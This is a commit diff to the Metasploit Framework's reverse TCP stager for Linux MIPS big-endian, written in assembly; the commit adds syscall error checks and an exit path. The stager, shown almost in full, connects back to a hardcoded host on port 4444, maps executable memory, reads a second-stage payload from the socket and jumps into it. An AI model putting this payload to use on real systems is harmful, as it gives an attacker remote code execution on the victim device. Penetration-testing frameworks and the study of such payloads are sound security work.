fix reverse tcp stager src

2017-07-05 17:56:59 +09:00
parent d1f08a80bd
commit d02d6826a9
2 changed files with 27 additions and 7 deletions
@@ -4,7 +4,7 @@
 #        Type: Stager
 #   Qualities: No Nulls out of the IP / Port data
 #   Platforms: Linux MIPS Big Endian
-#     Authors: juan vazquez <juan.vazquez [at] metasploit.com>
+#     Authors: juan vazquez <juan.vazquez [at] metasploit.com>, tkmru
 #     License:
 #
 #        This file is part of the Metasploit Exploit Framework
@@ -29,12 +29,11 @@
 ##
 	.text
 	.align  2
-	.globl  main
+        .globl  main
 	.set    nomips16
 main:
 	.set    noreorder
 	.set    nomacro
-
 	# socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
 	# a0: domain = PF_INET (2)
 	# a1: type = SOCK_STREAM (2)
@@ -47,8 +46,9 @@ main:
 	slti    $a2, $zero, -1
 	li      $v0, 4183
 	syscall 0x40404
-
-  sw      $v0, -4($sp) # store the file descriptor for the socket on the stack
+  slt     $s0, $zero, $a3
+  bne     $s0, $zero, failed
+	sw      $v0, -4($sp) # store the file descriptor for the socket on the stack

 	# connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16)
 	# a0: sockfd
@@ -69,6 +69,8 @@ main:
 	nor     $a2, $t4, $zero
 	li      $v0, 4170
 	syscall 0x40404
+  slt     $s0, $zero, $a3
+  bne     $s0, $zero, failed

 	# mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
 	# a0: addr = -1
@@ -92,7 +94,8 @@ main:
 	sw      $2, -5($t3)         # Doesn't use $sp directly to avoid nulls
 	li      $v0, 4090
 	syscall 0x40404
-
+  slt $s0, $zero, $a3
+  bne $s0, $zero, failed
 	sw      $v0, -8($sp)        # Stores the mmap'ed address on the stack

 	# read(sockfd, addr, 4096)
@@ -106,6 +109,8 @@ main:
 	addi    $a2, $a2, -1
 	li      $v0, 4003
 	syscall 0x40404
+  slt $s0, $zero, $a3
+  bne $s0, $zero, failed

 	# cacheflush(addr, nbytes, DCACHE)
 	# a0: addr
@@ -119,11 +124,20 @@ main:
 	add     $a2, $t1, $0
 	li      $v0, 4147
 	syscall 0x40404
-
+  slt     $s0, $zero, $a3
+  bne     $s0, $zero, failed
 	# jmp to the stage
 	lw      $s1, -8($sp)
 	lw      $s2, -4($sp)
 	jalr    $s1

+failed:
+	# exit(status)
+	# a0: status
+	# v0: syscall = __NR_exit (4001)
+	li      $a0, 1
+	li      $v0, 4001
+	syscall 0x40404
+
 	.set    macro
 	.set    reorder